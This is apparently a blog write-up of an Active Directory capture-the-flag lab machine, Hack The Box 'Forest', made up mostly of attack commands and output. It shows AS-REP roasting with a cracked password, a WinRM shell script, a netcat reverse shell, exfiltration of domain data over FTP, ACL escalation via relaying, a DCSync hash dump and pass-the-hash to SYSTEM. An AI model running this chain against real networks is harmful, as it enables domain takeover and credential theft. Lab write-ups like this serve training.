As usual, first an nmap scan

root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp
Starting Nmap 7.80 ( ) at 2020-01-06 11:47 CET
Nmap scan report for
Host is up (0.016s latency).
Not shown: 65511 closed ports
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49674/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc        Microsoft Windows RPC
49682/tcp open  msrpc        Microsoft Windows RPC
49701/tcp open  msrpc        Microsoft Windows RPC
49913/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 159.67 seconds

There are already several interesting things in this result. First of all, this is a domain-connected system with the HTB.local domain. It has exposed kerberos, ldap and SMB services to the outside world and looks like it is a domain controller. And last but not least, a WinRM port is open. This could be an attack similar to the approach I took a long time ago for the ‘Active’ Machine on Hackthebox, combined with the winRM attack on Heist!

First let’s try enum4linux to see if I can list some more information.

root@kalivm:~/Forest# enum4linux -a
Starting enum4linux v0.8.9 
|    Target Information    |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
|    Getting domain SID for    |
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
|    Users on    |
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
|    Password Policy Information for    |
[+] Attaching to using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
    [+] HTB
    [+] Builtin
[+] Password Info for Domain: HTB
    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes 
    [+] Password Complexity Flags: 000000
        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0
    [+] Minimum password age: 1 day 4 minutes 
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
|    Groups on    |
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
enum4linux complete on Mon Oct 21 12:05:29 2019

Enum4linux offers many interesting things. First of all I see that there are some users (sebastien, lucinda, andy, mark, santi) present and a clear service account (svc-alfresco).
Furthermore, no password complexity seems to have been enforced, which can mean easy to guess / crack passwords. There seems to be a Microsoft Exchange installation present which is commonly known as a major security vulnerability if not properly configured! And a last line confirms the prompting, Forest is actually part of the group of domain controllers! So I started browsing the impacket tools and trying several until I got to the tool.

root@kalivm:~/Forest# -dc-ip -no-pass HTB/sebastien
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for sebastien
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# -dc-ip -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# -dc-ip -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-alfresco

After trying it for some users, I finally got a TGT for the user svc-alfresco that I could try cracking with hashcat.

[hashcat] $ hashcat -m 18200 -a 0 -w 3 forest.hash rockyou.txt
Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB:a886b951410cd0d9b804...a751ba
Time.Started.....: Fri Oct 25 12:37:07 2019 (1 sec)
Time.Estimated...: Fri Oct 25 12:37:08 2019 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 13838.5 kH/s (13.64ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4587520/14344385 (31.98%)
Rejected.........: 0/4587520 (0.00%)
Restore.Point....: 3932160/14344385 (27.41%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: seaford123 ->
Hardware.Mon.#1..: Temp: 41c Fan: 24% Util: 46% Core:1898MHz Mem:3802MHz Bus:16

So apparently Alfresco’s password is s3rvice. The next thing I did was tweak the WinRM shell I made earlier for Hackthebox – Heist to include correct username, password and IP address

require 'winrm'

conn =
  endpoint: '',
  user: 'svc-alfresco',
  password: 's3rvice',

command="" do |shell|
    until command == "exit\n" do
        print "PS > "
        command = gets        
        output = do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
    puts "Exiting with code #{output.exitcode}"

and run it to get shell access.

root@kalivm:~/Forest# ruby shell.rb 
PS > whoami

All you have to do is get the user hash and start escalating privileges

PS > type ..\Desktop\user.txt

Privilege Escalation

The next step is escalating privileges, after pressing CTRL-C too many times I decided it was time to install a simple fallback.

root@kalivm:~/Forest# ruby shell.rb
PS > mkdir sedje
PS > cd sedje
PS > IWR -uri -outfile nc.exe

PS > ./nc 9002 -e powershell.exe
root@kalivm:~/Forest# nc -nvlp 9002
Listening on 9002
Connection received on 50030
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\svc-alfresco\Documents\sedje>
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri -outfile SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri -outfile SharpHound.exe
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Invoke-BloodHound -CollectionMethod All -LDAPUser svc-alfresco -LDAPPass s3rvice
PS C:\Users\svc-alfresco\Documents\sedje> dir

    Directory: C:\Users\svc-alfresco\Documents\sedje

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/25/2019   5:20 AM          12950
-a----        10/25/2019   5:20 AM           9151 Rk9SRVNU.bin
-a----        10/25/2019   5:18 AM         751616 SharpHound.exe
-a----        10/25/2019   5:17 AM         886595 SharpHound.ps1

After the SharpHound script and binary file are transferred, I run them with the user svc-alfresco and the script provides a zip file with all relevant domain data. All that remains is to transfer the file to my local machine and analyze it with BloodHound. The easiest and most used way I learned during my OSCP journey was to easily create and run an FTP script.

PS C:\Users\svc-alfresco\Documents\sedje> echo "open" > ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "anonymous" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "put" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "quit" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> ftp -s:ftp 
Log in with USER and PASS first.
User ( 

Of course, this approach requires an active FTP server on my attacker, which can be easily done with Python

root@kalivm:~/Forest# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/ RuntimeWarning: write permissions assigned to anonymous user.
[I 2019-10-25 13:15:13] >>> starting FTP server on, pid=5057 < <<
[I 2019-10-25 13:15:13] concurrency model: async
[I 2019-10-25 13:15:13] masquerade (NAT) address: None
[I 2019-10-25 13:15:13] passive ports: None
[I 2019-10-25 13:15:27][] FTP session opened (connect)
[I 2019-10-25 13:15:27][anonymous] USER 'anonymous' logged in.
[I 2019-10-25 13:15:27][anonymous] STOR /root/Documents/htb/Machines/Forest/ completed=1 bytes=12950 seconds=0.07
[I 2019-10-25 13:15:27][anonymous] FTP session closed (disconnect).

Thus, the file has been successfully transferred and can be loaded directly into BloodHound by simply dragging and dropping.

In the “bloodhound overview” of the shortest path to domain manager, I see that a user who is part of the ‘Exchange Windows permissions’ group has the ability to write the ACL of the entire HTB.Local domain, for example the Password hashes. I can also see that the svc-alfresco user has GenericAll permissions for that particular group through their delegated memberships of `Service Accounts`,` Privileged IT Accounts` and `Account Operators`.
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri -outfile Powerview.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\PowerView.ps1
PS C:\Users\svc-alfresco\Documents\sedje> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
PS C:\Users\svc-alfresco\Documents\sedje> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
PS C:\Users\svc-alfresco\Documents\sedje> New-DomainUser -SamAccountName sedje -AccountPassword $SecPassword -Credential $Cred | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $Cred

When you add the svc alfresco account to the ‘Exchange Windows Permissions’ group, it will be deleted again after a few minutes, which is quite a pain. So I decide to add my own user to the domain with the same password as user svc-alfresco and add to the group `Exchange Windows permissions`. However, after that, I lingered for a long time due to the very specific syntax and switches required (and available) with the impacket tools. If some Discord users had not helped me, I would probably have given up in the end, so I have to thank them for pushing them in the next step!

root@kalivm:~/Forest# --escalate-user sedje -t ldap://
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections

Now all I have to do is browse to the localhost connection and provide valid credentials, NTLMRelay will do all the hard work and change the permissions for me.I open a browser for localhost and provide the sedje credentials.

[*] HTTPD: Received connection from, attacking target ldap://
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap:// as \sedje SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User sedje now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with and this user :)
[*] Saved restore state to aclpwn-20191025-135738.restoresedsedss

And already tells me what to do, sedje now has proper permissions to continue

root@kalivm:~/Forest# htb/sedje:s3rvice@
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets

Use to get all the hashes in the domain

root@kalivm:~/Forest# -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@ powershell.exe
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file ezaVoayr.exe
[*] Opening SVCManager on
[*] Creating service CAke on
[*] Starting service CAke.....
[!] Press help for extra shell commands
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt

Author: Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *